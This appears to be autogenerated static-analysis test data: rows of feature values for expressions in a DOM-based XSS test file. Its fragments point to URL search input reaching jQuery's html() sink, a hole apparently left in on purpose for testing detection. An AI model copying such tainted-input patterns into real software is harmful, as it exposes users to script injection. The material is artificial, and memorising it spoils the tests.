autogenerated/Xss/DomBasedXss/tst.js:68:1:68:14 | $('myId').html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:14 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:21 | $('myId ... (bar()) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:21 | $('myId ... (bar()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:21 | $('myId ... (bar()) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:21 | exceptional return of $('myId ... (bar()) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:21 | exceptional return of $('myId ... (bar()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:68:1:68:21 | exceptional return of $('myId ... (bar()) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:68:3:68:8 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:68:3:68:8 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:68:3:68:8 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:68:3:68:8 | 'myId' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:68:3:68:8 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:68:11:68:14 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:68:11:68:14 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:68:11:68:14 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:68:16:68:18 | bar | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:68:16:68:18 | bar | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:68:16:68:18 | bar | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:68:16:68:20 | bar() | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:68:16:68:20 | bar() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:68:16:68:20 | bar() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:68:16:68:20 | bar() | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:68:16:68:20 | bar() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:68:16:68:20 | exceptional return of bar() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:68:16:68:20 | exceptional return of bar() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:68:16:68:20 | exceptional return of bar() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:70:27 | [,docum ... search] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:70:27 | [,docum ... search] | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:70:27 | [,docum ... search] | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:70:35 | [,docum ... forEach | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:70:35 | [,docum ... forEach | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:70:35 | [,docum ... forEach | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:74:2 | [,docum ... (x);\\n}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:74:2 | [,docum ... (x);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:74:2 | [,docum ... (x);\\n}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:74:2 | exceptional return of [,docum ... (x);\\n}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:74:2 | exceptional return of [,docum ... (x);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:1:74:2 | exceptional return of [,docum ... (x);\\n}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:10 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:10 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:10 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:19 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:19 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:19 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:26 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:26 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:26 | documen ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:26 | documen ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:26 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:3:70:26 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:12:70:19 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:12:70:19 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:12:70:19 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:21:70:26 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:21:70:26 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:21:70:26 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:29:70:35 | forEach | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:29:70:35 | forEach | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:29:70:35 | forEach | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:70:36 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:70:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:70:36 | this | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:70:36 | this | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:70:36 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | 'arguments' object of anonymous function | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | 'arguments' object of anonymous function | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | exceptional return of anonymous function | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | exceptional return of anonymous function | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | functio ... l(x);\\n} | CalleeFlexibleAccessPath | ?.forEach | | autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | functio ... l(x);\\n} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | functio ... l(x);\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | functio ... l(x);\\n} | contextSurroundingFunctionParameters | (x) | | autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | functio ... l(x);\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | return of anonymous function | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | return of anonymous function | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:70:37:74:1 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | enclosingFunctionBody | x x $ myId html x | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | enclosingFunctionName | forEach#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:70:46:70:46 | x | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:71:7:71:7 | x | contextSurroundingFunctionParameters | (x) | +| 